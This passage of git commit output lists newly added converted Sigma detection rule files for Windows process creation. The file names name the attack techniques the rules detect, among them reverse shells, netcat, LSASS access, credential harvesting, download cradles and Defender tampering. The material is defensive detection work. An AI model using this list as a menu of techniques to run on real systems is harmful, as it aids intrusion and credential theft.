tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_dotnet.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_dotnet_dump.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_dump64.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_extexport.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_extrac32.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_extrac32_ads.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_format.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_ftp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_gather_network_info.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_gpscript.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_ie4uinit.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_ilasm.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_jsc.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_kavremover.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_manage_bde.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_mavinject_process_injection.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_mpiexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_msdeploy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_msdt_answer_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_openconsole.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_openwith.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pcalua.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pcwrun.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pcwrun_follina.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pcwutl.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pester.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pester_1.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_printbrm.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_pubprn.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_rasautou_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_register_app.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_remote.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_replace.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_runexehelper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_runscripthelper.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_scriptrunner.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_setres.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_sftp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_sideload_link_binary.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_sigverif.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_ssh.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_acccheckconsole.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_atbroker.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_certreq_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_dxcap.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_grpconv.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_susp_sqldumper_activity.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml create mode 
100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_tracker.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_ttdinject.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_tttracer_mod_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_type.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_unregmp2.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_utilityfunctions.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_visual_basic_compiler.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_visualuiaverifynative.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_vsiisexelauncher.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_wfc.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_wlrmdr.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolbin_workflow_compiler.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lolscript_register_app.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_lsass_process_clone.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_malware_conti_shadowcopy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_malware_script_dropper.yml create mode 
100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mftrace_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mmc_mmc20_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mmc_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mofcomp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mpcmdrun_dll_sideload_defender.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mpcmdrun_download_arbitrary_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msbuild_susp_parent_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msdt_arbitrary_command_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msdt_susp_cab_options.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msdt_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msedge_proxy_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_http.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_inline_vbscript.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_javascript.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_lethalhta_technique.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mshta_susp_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_embedding.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_execute_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_install_quiet.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_install_remote.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_masquerading.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msiexec_web_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msohtmed_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mspub_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mssql_sqlps_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mssql_sqltoolsps_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mssql_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mssql_veaam_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mstsc_remote_connection.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msxsl_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_msxsl_remote_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_default_accounts_manipulation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_groups_and_accounts_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_network_connections_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_share_and_sessions_enum.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_share_unmount.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_start_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_stop_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_susp_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_use_mount_admin_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_use_mount_internet_share.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_use_mount_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_use_password_plaintext.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_user_add.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_net_user_add_never_expire.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_add_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_allow_program_in_susp_location.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_allow_rdp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_delete_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_disable.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_enable_group_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_rules_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_fw_set_rule.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_helper_dll_persistence.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_packet_capture.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_port_forwarding.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_port_forwarding_3389.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_netsh_wifi_credential_harvesting.yml 
create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_nltest_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_nltest_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_node_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_node_adobe_creative_cloud_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_nslookup_domain_discovery.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_nslookup_poweshell_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ntdsutil_susp_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ntdsutil_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_driver_install.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_driver_install_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_exec_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_register_dll_regsvr_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_response_file.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_response_file_susp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_odbcconf_uncommon_child_process.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_arbitrary_cli_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_excel_dcom_lateral_movement.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_exec_from_trusted_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_onenote_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_outlook_enable_unsafe_client_mail_rules.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_outlook_execution_from_temp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_outlook_susp_child_processes_remote.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_spawn_exe_from_users_directory.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_office_winword_dll_load.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_offlinescannershell_mpclient_sideloading.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pdqdeploy_runner_susp_children.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_perl_inline_command_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_php_inline_command_execution.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_ping_hex_ip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pktmon_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_plink_susp_tunneling.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powercfg_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_aadinternals_cmdlets_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_active_directory_module_dll_import.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_add_windows_capability.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_amsi_init_failed_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_amsi_null_bits_bypass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_audio_capture.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_encoded_cmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_frombase64string.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_iex.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_invoke.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_mppreference.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_reflection_assembly_load_obfusc.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_base64_wmi_classes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_cl_invocation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_cl_loadassembly.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_cl_mutexverifiers.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_cmdline_convertto_securestring.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_cmdline_special_characters.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_computer_discovery_get_adcomputer.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_create_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_decode_gzip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_decrypt_pattern.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_defender_disable_feature.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_defender_exclusion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_disable_defender_av_security_monitoring.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_disable_firewall.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_disable_ie_features.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_dll_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_downgrade_attack.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_download_com_cradles.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_download_cradles.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_download_dll.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_download_iex.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_download_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_email_exfil.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_encode.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_encoded_cmd_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_encoded_obfusc.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_encoding_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_exec_data_file.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_export_certificate.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_frombase64string.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_frombase64string_archive.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_get_clipboard.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_get_localgroup_member_recon.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_getprocess_lsass.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_hidden_b64_cmd.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_hide_services_via_set_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_iex_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_import_cert_susp_locations.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_import_module_susp_dirs.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_install_unsigned_appx_packages.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_invocation_specific.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_direct_ip.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_invoke_webrequest_download.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_mailboxexport_share.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_malicious_cmdlets.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_msexchange_transport_agent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_non_interactive_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_obfuscation_via_utf8.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_public_folder.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_remotefxvgpudisablement_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_reverse_shell_connection.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_run_script_from_ads.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_run_script_from_input_stream.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_sam_access.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_script_engine_parent.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_service_dacl_modification_set_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_set_acl.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_set_acl_susp_location.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_set_policies_to_unsecure_level.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_set_service_disabled.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_shadowcopy_deletion.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_snapins_hafnium.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_stop_service.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_susp_child_processes.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_susp_download_patterns.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_susp_parameter_variation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_susp_parent_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_susp_ps_appdata.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_susp_ps_downloadfile.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_tamper_defender_remove_mppreference.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_token_obfuscation.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_user_discovery_get_aduser.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_webclient_casing.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_x509enrollment.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_xor_commandline.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_powershell_zip_compress.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_presentationhost_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_presentationhost_uncommon_location_exec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pressanykey_lolbin_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_print_remote_file_copy.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_protocolhandler_download.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_provlaunch_potential_abuse.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_provlaunch_susp_child_process.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_psr_capture_screenshots.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_3proxy_execution.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_adfind_enumeration.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_adfind_susp_usage.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_advanced_ip_scanner.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_advanced_port_scanner.yml create mode 100644 
tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_advancedrun_priv_user.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_chisel.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_cleanwipe.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_crassus.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_csexec.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_defendercheck.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_ditsnap.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_frp.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_iox.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_netcat.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_ngrok.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_nimgrab.yml create mode 100644 tools/sigmac/converted_rules/builtin/process_creation/proc_creation_win_pua_nircmd.yml create mode 100644 